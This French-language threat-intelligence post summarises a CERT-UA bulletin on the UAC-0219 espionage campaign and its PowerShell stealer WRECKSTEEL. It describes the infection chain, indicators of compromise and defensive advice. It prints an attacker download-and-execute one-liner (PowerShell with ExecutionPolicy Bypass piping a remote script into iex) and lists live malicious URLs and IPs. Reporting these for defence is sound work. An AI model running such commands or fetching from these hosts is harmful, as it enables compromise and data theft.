Je vous propose une analyse du dernier bulletin d’alerte du CERT-UA sur UAC-219
Le contexte
En mars 2025, le CERT-UA (Computer Emergency Response Team of Ukraine) a détecté une campagne de cyberespionnage sophistiquée attribuée au groupe UAC-0219. Cette opération ciblait des organismes gouvernementaux et des infrastructures critiques en Ukraine. L’objectif des attaquants : collecter et exfiltrer des documents sensibles ainsi que des captures d’écran via un outil malveillant baptisé WRECKSTEEL, développé en PowerShell.
La chaîne d’infection (Kill-Chain)
Les attaques suivent un schéma structuré :
- Point d’entrée : envoi d’e-mails depuis des comptes compromis, contenant des liens vers des plateformes de partage de fichiers comme Google Drive ou DropMeFiles. Certains liens sont intégrés dans des fichiers PDF joints.
- Téléchargement initial : les liens pointent vers un fichier .js (VBScript déguisé) jouant le rôle de loader.
- Téléchargement secondaire : le VBScript récupère et exécute un script PowerShell.
- Exfiltration : ce script identifie des fichiers d’extensions ciblées (*.doc, .pdf, .xlsx, etc.) et capture l’écran de l’utilisateur. Les données sont ensuite transférées via cURL vers des serveurs contrôlés par l’attaquant.
Les capacités techniques de WRECKSTEEL
Le malware WRECKSTEEL est activement maintenu. En 2024, les attaques utilisaient un installeur NSIS contenant :
- un leurre (PDF ou image JPG),
- un stealer VBScript,
- l’outil IrfanView pour les captures d’écran.
En 2025, le processus est optimisé : les captures sont désormais réalisées directement en PowerShell, supprimant ainsi toute dépendance à des exécutables tiers.
La structure opérationnelle
Chaque vague d’attaque correspond à une nouvelle phase opérationnelle, avec des fichiers et des noms modifiés à chaque itération. Le groupe UAC-0219 applique une discipline rigoureuse : renouvellement fréquent des serveurs, des noms de fichiers et des scripts. L’exécution des scripts utilise systématiquement des commandes PowerShell furtives, par exemple :
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://<ip>/script.ps1' | iex" Les indicateurs de compromission (IOC)
Quelques fichiers malveillants
- Septembre 2024 : seeddoc.exe, photo_15.09.24_JPG.js, AppFinalDesktop.vbs
- Octobre 2024 : visa_letter.exe, lumina.exe, Ahmad_Aldhefairi_Visa_Appeal_Letter_PDF.pdf
- Février 2025 : script.ps1, fichiers PowerShell sans extension
- Mars 2025 : scripts avec thématique salariale, par exemple Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.js
- Mi-mars 2025 : scratest.ps1, scrxxx.ps1, Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf
Les réseaux IP et domaines associés
- http://172.86.114.149/seeddoc.exe
- http://45.61.157.179/script.ps1
- http://144.172.98.178/scretest.ps1
- https://dropmefiles.cc/ua/d/pweym/…
- https://drive.google.com/file/d/1bsf3i4f0jsb8bpdsxeedaejpenzo0nwt/view?usp=sharing
- DNS associés : 172.86.114.149, 45.61.141.215, 91.203.63.10, 167.88.167.254
Les recommandations du CERT-UA
- Mise en place de règles de détection sur les exécutions PowerShell anormales.
- Blocage des extensions .js, .vbs, .ps1 en provenance d’outils de partage externes.
- Application du principe de moindre privilège et segmentation réseau.
- Sensibilisation des utilisateurs aux faux partages de documents.
Sources
- Rapport CERT-UA #14283 : https://cert.gov.ua/article/6282902
- Liste complète des indicateurs techniques (hashs, URLs, IPs) : https://cert.gov.ua/storage/app/sites/1/Reports/apt-uac-0219-ioc-report-mar-2025.txt
- OTX AlienVault (échantillons) : https://otx.alienvault.com/indicator/file/897966ae3a4cbd3b63e3a0eba41158a8
- MalwareBazaar (hashs associés à WRECKSTEEL) : https://bazaar.abuse.ch/sample/aaef9799a198169f8b88198cfb8c50ba/
